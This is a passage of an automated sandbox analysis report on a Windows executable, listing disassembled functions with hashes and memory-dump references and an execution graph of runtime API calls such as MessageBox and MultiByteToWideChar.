                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84417E62F0C762E9FB10FBB198506FC26BAAF54758F540035DE4DA7B89DF78A4429320
                                                                                                                                                                                                                                                            Function 00007FF6404FBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                            • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                            • Instruction ID: 8b8d4b9416c589f260b880531aaf5e651441b8178d234a713b01115a6015ebe5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F041B122A1CAA5D6EB20EF65E8443AA6765FB88794F804131EE4DC7788DF3CD441CB40
                                                                                                                                                                                                                                                            Function 00007FF6404FE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                                                            • Instruction ID: 265fd425774259fe4c10bacb84e146b6f2c0bc7eed03276dbc83b9e05cfd5995
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621D572B0C691D1EB64BB16D04467E73A6FB84B84F854035DA8C83384CFBCDA45C751
                                                                                                                                                                                                                                                            Function 00007FF6404EF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction ID: d5508817ca1574cb3cdebf1fea9f4d7507e4a5c8921daac632a5552b477f6921
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11793660CB8182EB21AB14E440269B7E0FB88B88F188230DA8C47769DF3CC5518B00
                                                                                                                                                                                                                                                            Function 00007FF6404FFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction ID: 512d6b907b4660450709611d994324b7190bfa6b4bc0ead6391dc0269b747c2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9017822E1C666E6FB24BFA0A46127E22A5EF88708F840036D94DC6791DE6CE544DB24

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:7.3%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                            Total number of Limit Nodes:23
                                                                                                                                                                                                                                                            execution_graph 15755 7ff6404e2d00 15756 7ff6404e2d10 15755->15756 15757 7ff6404e2d61 15756->15757 15758 7ff6404e2d4b 15756->15758 15760 7ff6404e2d81 15757->15760 15770 7ff6404e2d97 __vcrt_freefls 15757->15770 15811 7ff6404e25f0 15758->15811 15761 7ff6404e25f0 53 API calls 15760->15761 15773 7ff6404e2d57 __vcrt_freefls 15761->15773 15765 7ff6404e3069 15767 7ff6404e25f0 53 API calls 15765->15767 15767->15773 15768 7ff6404e3053 15769 7ff6404e25f0 53 API calls 15768->15769 15769->15773 15770->15765 15770->15768 15771 7ff6404e302d 15770->15771 15770->15773 15774 7ff6404e2f27 15770->15774 15783 7ff6404e1440 15770->15783 15807 7ff6404e1bf0 15770->15807 15772 7ff6404e25f0 53 API calls 15771->15772 15772->15773 15822 7ff6404eb870 15773->15822 15775 7ff6404e2f93 15774->15775 15831 7ff6404f9714 15774->15831 15777 7ff6404e2fbe 15775->15777 15778 7ff6404e2fb0 15775->15778 15838 7ff6404e2af0 15777->15838 15780 7ff6404f9714 37 API calls 15778->15780 15781 7ff6404e2fbc 15780->15781 15842 7ff6404e2470 15781->15842 15852 7ff6404e3f70 15783->15852 15786 7ff6404e146b 15788 7ff6404e25f0 53 API calls 15786->15788 15787 7ff6404e148c 15862 7ff6404ef9f4 15787->15862 15790 7ff6404e147b 15788->15790 15790->15770 15791 7ff6404e14a1 15792 7ff6404e14a5 15791->15792 15793 7ff6404e14c1 15791->15793 15888 7ff6404e2760 15792->15888 15795 7ff6404e14f1 15793->15795 15796 7ff6404e14d1 15793->15796 15798 7ff6404e14f7 15795->15798 15804 7ff6404e150a 15795->15804 15797 7ff6404e2760 53 API calls 15796->15797 15802 7ff6404e14bc __vcrt_freefls 15797->15802 15866 7ff6404e11f0 15798->15866 15801 7ff6404e1584 15801->15770 15884 7ff6404ef36c 15802->15884 15804->15802 15805 7ff6404e1596 15804->15805 15905 7ff6404ef6bc 15804->15905 15806 7ff6404e2760 53 API calls 15805->15806 15806->15802 15808 7ff6404e1c15 15807->15808 15809 7ff6404f3ca4 49 API calls 15808->15809 15810 7ff6404e1c38 15809->15810 15810->15770 15812 7ff6404e262a 15811->15812 15813 7ff6404f3ca4 49 API calls 15812->15813 15814 7ff6404e2652 15813->15814 15815 7ff6404e86b0 2 API calls 15814->15815 15816 7ff6404e266a 15815->15816 15817 7ff6404e268e MessageBoxA 15816->15817 15818 7ff6404e2677 MessageBoxW 15816->15818 15819 7ff6404e26a0 15817->15819 15818->15819 15820 7ff6404eb870 _log10_special 8 API calls 15819->15820 15821 7ff6404e26b0 15820->15821 15821->15773 15824 7ff6404eb879 15822->15824 15823 7ff6404e2f1a 15824->15823 15825 7ff6404ebc00 IsProcessorFeaturePresent 15824->15825 15826 7ff6404ebc18 15825->15826 16938 7ff6404ebdf8 RtlCaptureContext 15826->16938 15832 7ff6404f972b 15831->15832 15835 7ff6404f975c 15831->15835 15833 7ff6404f97b4 __std_exception_copy 37 API calls 15832->15833 15832->15835 15834 7ff6404f9758 15833->15834 15834->15835 15836 7ff6404f9c10 _isindst 17 API calls 15834->15836 15835->15775 15837 7ff6404f9788 15836->15837 15841 7ff6404e2b24 15838->15841 15839 7ff6404e2c8f 15839->15781 15840 7ff6404f9714 37 API calls 15840->15839 15841->15839 15841->15840 15843 7ff6404e249c 15842->15843 15846 7ff6404e24a6 15842->15846 15844 7ff6404e86b0 2 API calls 15843->15844 15844->15846 15845 7ff6404e24bb 15848 7ff6404e86b0 2 API calls 15845->15848 15850 7ff6404e24d0 15845->15850 15846->15845 15847 7ff6404e86b0 2 API calls 15846->15847 15847->15845 15848->15850 16943 7ff6404e2300 15850->16943 15851 7ff6404e24ec __vcrt_freefls 15851->15773 15853 7ff6404e3f7c 15852->15853 15908 7ff6404e86b0 15853->15908 15855 7ff6404e3fa4 15856 7ff6404e86b0 2 API calls 15855->15856 15857 7ff6404e3fb7 15856->15857 15913 7ff6404f52a4 15857->15913 15860 7ff6404eb870 _log10_special 8 API calls 15861 7ff6404e1463 15860->15861 15861->15786 15861->15787 15863 7ff6404efa24 15862->15863 16517 7ff6404ef784 15863->16517 15865 7ff6404efa3d 15865->15791 15867 7ff6404e1248 15866->15867 15868 7ff6404e124f 15867->15868 15869 7ff6404e1277 15867->15869 15870 7ff6404e25f0 53 API calls 15868->15870 15872 7ff6404e1291 15869->15872 15873 7ff6404e12ad 15869->15873 15871 7ff6404e1262 15870->15871 15871->15802 15874 7ff6404e2760 53 API calls 15872->15874 15875 7ff6404e12bf 15873->15875 15883 7ff6404e12db memcpy_s 15873->15883 15879 7ff6404e12a8 __vcrt_freefls 15874->15879 15876 7ff6404e2760 53 API calls 15875->15876 15876->15879 15877 7ff6404ef6bc _fread_nolock 53 API calls 15877->15883 15878 7ff6404ef430 37 API calls 15878->15883 15879->15802 15880 7ff6404e139f 15881 7ff6404e25f0 53 API calls 15880->15881 15881->15879 15883->15877 15883->15878 15883->15879 15883->15880 16529 7ff6404efdfc 15883->16529 15885 7ff6404ef39c 15884->15885 16548 7ff6404ef148 15885->16548 15887 7ff6404ef3b5 15887->15801 15889 7ff6404e277c 15888->15889 15890 7ff6404f43f4 _get_daylight 11 API calls 15889->15890 15891 7ff6404e2799 15890->15891 16559 7ff6404f3ca4 15891->16559 15896 7ff6404e1bf0 49 API calls 15897 7ff6404e2807 15896->15897 15898 7ff6404e86b0 2 API calls 15897->15898 15899 7ff6404e281f 15898->15899 15900 7ff6404e2843 MessageBoxA 15899->15900 15901 7ff6404e282c MessageBoxW 15899->15901 15902 7ff6404e2855 15900->15902 15901->15902 15903 7ff6404eb870 _log10_special 8 API calls 15902->15903 15904 7ff6404e2865 15903->15904 15904->15802 16924 7ff6404ef6dc 15905->16924 15909 7ff6404e86d2 MultiByteToWideChar 15908->15909 15912 7ff6404e86f6 15908->15912 15910 7ff6404e870c __vcrt_freefls 15909->15910 15909->15912 15910->15855 15911 7ff6404e8713 MultiByteToWideChar 15911->15910 15912->15910 15912->15911 15914 7ff6404f51d8 15913->15914 15915 7ff6404f51fe 15914->15915 15918 7ff6404f5231 15914->15918 15944 7ff6404f43f4 15915->15944 15920 7ff6404f5244 15918->15920 15921 7ff6404f5237 15918->15921 15932 7ff6404f9f38 15920->15932 15922 7ff6404f43f4 _get_daylight 11 API calls 15921->15922 15924 7ff6404e3fc6 15922->15924 15924->15860 15951 7ff6404ff5e8 EnterCriticalSection 15932->15951 15945 7ff6404fa5d8 _get_daylight 11 API calls 15944->15945 15946 7ff6404f43fd 15945->15946 15947 7ff6404f9bf0 15946->15947 16477 7ff6404f9a88 15947->16477 15949 7ff6404f9c09 15949->15924 16478 7ff6404f9ab3 16477->16478 16481 7ff6404f9b24 16478->16481 16480 7ff6404f9ada 16480->15949 16491 7ff6404f986c 16481->16491 16484 7ff6404f9b5f 16484->16480 16487 7ff6404f9c10 _isindst 17 API calls 16488 7ff6404f9bef 16487->16488 16489 7ff6404f9a88 _invalid_parameter_noinfo 37 API calls 16488->16489 16490 7ff6404f9c09 16489->16490 16490->16480 16492 7ff6404f98c3 16491->16492 16493 7ff6404f9888 GetLastError 16491->16493 16492->16484 16497 7ff6404f98d8 16492->16497 16494 7ff6404f9898 16493->16494 16500 7ff6404fa6a0 16494->16500 16498 7ff6404f98f4 GetLastError SetLastError 16497->16498 16499 7ff6404f990c 16497->16499 16498->16499 16499->16484 16499->16487 16501 7ff6404fa6bf FlsGetValue 16500->16501 16502 7ff6404fa6da FlsSetValue 16500->16502 16503 7ff6404fa6d4 16501->16503 16505 7ff6404f98b3 SetLastError 16501->16505 16504 7ff6404fa6e7 16502->16504 16502->16505 16503->16502 16506 7ff6404fdea8 _get_daylight 11 API calls 16504->16506 16505->16492 16507 7ff6404fa6f6 16506->16507 16508 7ff6404fa714 FlsSetValue 16507->16508 16509 7ff6404fa704 FlsSetValue 16507->16509 16511 7ff6404fa732 16508->16511 16512 7ff6404fa720 FlsSetValue 16508->16512 16510 7ff6404fa70d 16509->16510 16514 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16510->16514 16513 7ff6404fa204 _get_daylight 11 API calls 16511->16513 16512->16510 16515 7ff6404fa73a 16513->16515 16514->16505 16516 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16515->16516 16516->16505 16518 7ff6404ef7ee 16517->16518 16519 7ff6404ef7ae 16517->16519 16518->16519 16521 7ff6404ef7fa 16518->16521 16520 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16519->16520 16522 7ff6404ef7d5 16520->16522 16528 7ff6404f477c EnterCriticalSection 16521->16528 16522->15865 16530 7ff6404efe2c 16529->16530 16533 7ff6404efb4c 16530->16533 16532 7ff6404efe4a 16532->15883 16534 7ff6404efb6c 16533->16534 16535 7ff6404efb99 16533->16535 16534->16535 16536 7ff6404efba1 16534->16536 16537 7ff6404efb76 16534->16537 16535->16532 16540 7ff6404efa8c 16536->16540 16538 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16537->16538 16538->16535 16547 7ff6404f477c EnterCriticalSection 16540->16547 16549 7ff6404ef163 16548->16549 16551 7ff6404ef191 16548->16551 16550 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16549->16550 16552 7ff6404ef183 16550->16552 16551->16552 16558 7ff6404f477c EnterCriticalSection 16551->16558 16552->15887 16561 7ff6404f3cfe 16559->16561 16560 7ff6404f3d23 16562 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16560->16562 16561->16560 16563 7ff6404f3d5f 16561->16563 16565 7ff6404f3d4d 16562->16565 16589 7ff6404f1f30 16563->16589 16568 7ff6404eb870 _log10_special 8 API calls 16565->16568 16566 7ff6404f3e3c 16567 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16566->16567 16567->16565 16570 7ff6404e27d8 16568->16570 16577 7ff6404f4480 16570->16577 16571 7ff6404f3e60 16571->16566 16574 7ff6404f3e6a 16571->16574 16572 7ff6404f3e11 16575 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16572->16575 16573 7ff6404f3e08 16573->16566 16573->16572 16576 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16574->16576 16575->16565 16576->16565 16578 7ff6404fa5d8 _get_daylight 11 API calls 16577->16578 16579 7ff6404f4497 16578->16579 16580 7ff6404e27df 16579->16580 16581 7ff6404fdea8 _get_daylight 11 API calls 16579->16581 16584 7ff6404f44d7 16579->16584 16580->15896 16582 7ff6404f44cc 16581->16582 16583 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16582->16583 16583->16584 16584->16580 16915 7ff6404fdf30 16584->16915 16587 7ff6404f9c10 _isindst 17 API calls 16588 7ff6404f451c 16587->16588 16590 7ff6404f1f6e 16589->16590 16595 7ff6404f1f5e 16589->16595 16591 7ff6404f1f77 16590->16591 16597 7ff6404f1fa5 16590->16597 16593 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16591->16593 16592 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16594 7ff6404f1f9d 16592->16594 16593->16594 16594->16566 16594->16571 16594->16572 16594->16573 16595->16592 16597->16594 16597->16595 16599 7ff6404f2254 16597->16599 16603 7ff6404f28c0 16597->16603 16629 7ff6404f2588 16597->16629 16659 7ff6404f1e10 16597->16659 16662 7ff6404f3ae0 16597->16662 16601 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16599->16601 16601->16595 16604 7ff6404f2975 16603->16604 16605 7ff6404f2902 16603->16605 16608 7ff6404f29cf 16604->16608 16609 7ff6404f297a 16604->16609 16606 7ff6404f299f 16605->16606 16607 7ff6404f2908 16605->16607 16686 7ff6404f0e70 16606->16686 16615 7ff6404f290d 16607->16615 16618 7ff6404f29de 16607->16618 16608->16606 16608->16618 16627 7ff6404f2938 16608->16627 16610 7ff6404f29af 16609->16610 16611 7ff6404f297c 16609->16611 16693 7ff6404f0a60 16610->16693 16613 7ff6404f291d 16611->16613 16617 7ff6404f298b 16611->16617 16628 7ff6404f2a0d 16613->16628 16668 7ff6404f3224 16613->16668 16615->16613 16619 7ff6404f2950 16615->16619 16615->16627 16617->16606 16621 7ff6404f2990 16617->16621 16618->16628 16700 7ff6404f1280 16618->16700 16619->16628 16678 7ff6404f36e0 16619->16678 16621->16628 16682 7ff6404f3878 16621->16682 16623 7ff6404eb870 _log10_special 8 API calls 16625 7ff6404f2ca3 16623->16625 16625->16597 16627->16628 16707 7ff6404fdb68 16627->16707 16628->16623 16630 7ff6404f2593 16629->16630 16631 7ff6404f25a9 16629->16631 16633 7ff6404f2975 16630->16633 16634 7ff6404f2902 16630->16634 16642 7ff6404f25e7 16630->16642 16632 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16631->16632 16631->16642 16632->16642 16637 7ff6404f29cf 16633->16637 16638 7ff6404f297a 16633->16638 16635 7ff6404f299f 16634->16635 16636 7ff6404f2908 16634->16636 16641 7ff6404f0e70 38 API calls 16635->16641 16644 7ff6404f290d 16636->16644 16646 7ff6404f29de 16636->16646 16637->16635 16637->16646 16658 7ff6404f2938 16637->16658 16639 7ff6404f29af 16638->16639 16640 7ff6404f297c 16638->16640 16645 7ff6404f0a60 38 API calls 16639->16645 16649 7ff6404f298b 16640->16649 16653 7ff6404f291d 16640->16653 16641->16658 16642->16597 16643 7ff6404f3224 47 API calls 16643->16658 16647 7ff6404f2950 16644->16647 16644->16653 16644->16658 16645->16658 16648 7ff6404f1280 38 API calls 16646->16648 16656 7ff6404f2a0d 16646->16656 16650 7ff6404f36e0 47 API calls 16647->16650 16647->16656 16648->16658 16649->16635 16651 7ff6404f2990 16649->16651 16650->16658 16654 7ff6404f3878 37 API calls 16651->16654 16651->16656 16652 7ff6404eb870 _log10_special 8 API calls 16655 7ff6404f2ca3 16652->16655 16653->16643 16653->16656 16654->16658 16655->16597 16656->16652 16657 7ff6404fdb68 47 API calls 16657->16658 16658->16656 16658->16657 16890 7ff6404f0034 16659->16890 16663 7ff6404f3af7 16662->16663 16907 7ff6404fccc8 16663->16907 16669 7ff6404f3246 16668->16669 16717 7ff6404efea0 16669->16717 16674 7ff6404f3ae0 45 API calls 16677 7ff6404f3383 16674->16677 16675 7ff6404f3ae0 45 API calls 16676 7ff6404f340c 16675->16676 16676->16627 16677->16675 16677->16676 16677->16677 16679 7ff6404f3760 16678->16679 16680 7ff6404f36f8 16678->16680 16679->16627 16680->16679 16681 7ff6404fdb68 47 API calls 16680->16681 16681->16679 16685 7ff6404f3899 16682->16685 16683 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16684 7ff6404f38ca 16683->16684 16684->16627 16685->16683 16685->16684 16687 7ff6404f0ea3 16686->16687 16688 7ff6404f0ed2 16687->16688 16690 7ff6404f0f8f 16687->16690 16689 7ff6404efea0 12 API calls 16688->16689 16692 7ff6404f0f0f 16688->16692 16689->16692 16691 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16690->16691 16691->16692 16692->16627 16694 7ff6404f0a93 16693->16694 16695 7ff6404f0ac2 16694->16695 16697 7ff6404f0b7f 16694->16697 16696 7ff6404efea0 12 API calls 16695->16696 16699 7ff6404f0aff 16695->16699 16696->16699 16698 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16697->16698 16698->16699 16699->16627 16701 7ff6404f12b3 16700->16701 16702 7ff6404f12e2 16701->16702 16704 7ff6404f139f 16701->16704 16703 7ff6404efea0 12 API calls 16702->16703 16706 7ff6404f131f 16702->16706 16703->16706 16705 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16704->16705 16705->16706 16706->16627 16708 7ff6404fdb90 16707->16708 16709 7ff6404fdbd5 16708->16709 16711 7ff6404f3ae0 45 API calls 16708->16711 16712 7ff6404fdbbe memcpy_s 16708->16712 16716 7ff6404fdb95 memcpy_s 16708->16716 16709->16712 16709->16716 16887 7ff6404ffaf8 16709->16887 16710 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16710->16716 16711->16709 16712->16710 16712->16716 16716->16627 16718 7ff6404efed7 16717->16718 16724 7ff6404efec6 16717->16724 16719 7ff6404fc90c _fread_nolock 12 API calls 16718->16719 16718->16724 16720 7ff6404eff04 16719->16720 16721 7ff6404eff18 16720->16721 16722 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16720->16722 16723 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16721->16723 16722->16721 16723->16724 16725 7ff6404fd880 16724->16725 16726 7ff6404fd8d0 16725->16726 16727 7ff6404fd89d 16725->16727 16726->16727 16729 7ff6404fd902 16726->16729 16728 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16727->16728 16738 7ff6404f3361 16728->16738 16735 7ff6404fda15 16729->16735 16742 7ff6404fd94a 16729->16742 16730 7ff6404fdb07 16780 7ff6404fcd6c 16730->16780 16732 7ff6404fdacd 16773 7ff6404fd104 16732->16773 16734 7ff6404fda9c 16766 7ff6404fd3e4 16734->16766 16735->16730 16735->16732 16735->16734 16736 7ff6404fda5f 16735->16736 16739 7ff6404fda55 16735->16739 16756 7ff6404fd614 16736->16756 16738->16674 16738->16677 16739->16732 16741 7ff6404fda5a 16739->16741 16741->16734 16741->16736 16742->16738 16747 7ff6404f97b4 16742->16747 16745 7ff6404f9c10 _isindst 17 API calls 16746 7ff6404fdb64 16745->16746 16748 7ff6404f97c1 16747->16748 16749 7ff6404f97cb 16747->16749 16748->16749 16754 7ff6404f97e6 16748->16754 16750 7ff6404f43f4 _get_daylight 11 API calls 16749->16750 16751 7ff6404f97d2 16750->16751 16753 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16751->16753 16752 7ff6404f97de 16752->16738 16752->16745 16753->16752 16754->16752 16755 7ff6404f43f4 _get_daylight 11 API calls 16754->16755 16755->16751 16789 7ff6405033bc 16756->16789 16760 7ff6404fd6bc 16761 7ff6404fd711 16760->16761 16762 7ff6404fd6dc 16760->16762 16765 7ff6404fd6c0 16760->16765 16842 7ff6404fd200 16761->16842 16838 7ff6404fd4bc 16762->16838 16765->16738 16767 7ff6405033bc 38 API calls 16766->16767 16768 7ff6404fd42e 16767->16768 16769 7ff640502e04 37 API calls 16768->16769 16770 7ff6404fd47e 16769->16770 16771 7ff6404fd482 16770->16771 16772 7ff6404fd4bc 45 API calls 16770->16772 16771->16738 16772->16771 16774 7ff6405033bc 38 API calls 16773->16774 16775 7ff6404fd14f 16774->16775 16776 7ff640502e04 37 API calls 16775->16776 16777 7ff6404fd1a7 16776->16777 16778 7ff6404fd1ab 16777->16778 16779 7ff6404fd200 45 API calls 16777->16779 16778->16738 16779->16778 16781 7ff6404fcde4 16780->16781 16782 7ff6404fcdb1 16780->16782 16784 7ff6404fcdfc 16781->16784 16786 7ff6404fce7d 16781->16786 16783 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16782->16783 16788 7ff6404fcddd memcpy_s 16783->16788 16785 7ff6404fd104 46 API calls 16784->16785 16785->16788 16787 7ff6404f3ae0 45 API calls 16786->16787 16786->16788 16787->16788 16788->16738 16790 7ff64050340f fegetenv 16789->16790 16853 7ff64050713c 16790->16853 16792 7ff64050348f 16797 7ff6404f97b4 __std_exception_copy 37 API calls 16792->16797 16793 7ff640503552 16794 7ff64050713c 37 API calls 16793->16794 16796 7ff64050357c 16794->16796 16795 7ff640503462 16795->16793 16798 7ff64050352c 16795->16798 16799 7ff64050347d 16795->16799 16800 7ff64050713c 37 API calls 16796->16800 16801 7ff64050350d 16797->16801 16802 7ff6404f97b4 __std_exception_copy 37 API calls 16798->16802 16799->16792 16799->16793 16803 7ff64050358d 16800->16803 16804 7ff640504634 16801->16804 16808 7ff640503515 16801->16808 16802->16801 16859 7ff640507330 16803->16859 16805 7ff6404f9c10 _isindst 17 API calls 16804->16805 16807 7ff640504649 16805->16807 16809 7ff6404eb870 _log10_special 8 API calls 16808->16809 16810 7ff6404fd661 16809->16810 16834 7ff640502e04 16810->16834 16811 7ff64050399f memcpy_s 16812 7ff640503637 memcpy_s 16831 7ff640503a93 memcpy_s 16812->16831 16833 7ff640503f7b memcpy_s 16812->16833 16813 7ff6405035f6 memcpy_s 16813->16811 16813->16812 16817 7ff6404f43f4 _get_daylight 11 API calls 16813->16817 16815 7ff640503cdf 16877 7ff640502f20 16815->16877 16818 7ff640503a70 16817->16818 16820 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16818->16820 16820->16812 16821 7ff640503c8b 16821->16815 16868 7ff64050464c 16821->16868 16822 7ff6405045d8 16824 7ff64050713c 37 API calls 16822->16824 16823 7ff64050464c memcpy_s 37 API calls 